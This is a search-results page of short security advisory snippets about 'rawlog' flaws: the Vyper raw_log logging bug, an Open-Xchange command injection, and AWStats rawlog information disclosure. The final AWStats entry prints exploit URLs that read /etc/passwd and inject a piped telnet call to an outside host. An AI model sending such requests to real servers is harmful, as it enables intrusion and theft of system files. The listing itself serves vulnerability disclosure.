9 matches found
GHSA-XCHQ-W5R3-4WG3 vyper performs incorrect topic logging in raw_log
Summary: Incorrect values can be logged when the raw_log builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in production. In particular, no uses of raw_log were found at all in production; it is apparently not ...
vyper performs incorrect topic logging in raw_log
Summary: Incorrect values can be logged when the raw_log builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in production. In particular, no uses of raw_log were found at all in production; it is apparently not ...
CVE-2024-32645
Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 and prior, incorrect values can be logged when the raw_log builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in...
CVE-2024-32645 vyper performs incorrect topic logging in raw_log
Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 and prior, incorrect values can be logged when the raw_log builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in...
CVE-2024-32645
Vyper (Pythonic smart contract language for the EVM) is affected by CVE-2024-32645 in versions 0.3.10 and earlier. The root cause is in the RawLog.build_IR path: it fails to unwrap variables provided as topics, causing incorrect values to be logged as topics. As of publication, no fixed version i...
Open-Xchange: command Injection in rawlog binary
Quick Overview: I have found a Command Injection vulnerability in the code where a method calls an OS Shell command using an untrusted string to execute. Introduction: Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable...
AWStats rawlog Plugin File Information Disclosure - Ver2 (CVE-2005-0435)
An information disclosure vulnerability has been reported in Awstats. Successful exploitation of this vulnerability would allow remote attackers to gain access to sensitive information...
CVE-2005-0435
awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to read server web logs by setting the loadplugin and pluginmode parameters to rawlog...
AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution
Example: http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd http://target/awstats.pl?filterrawlog=&rawlogmaxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet milw0rm.co...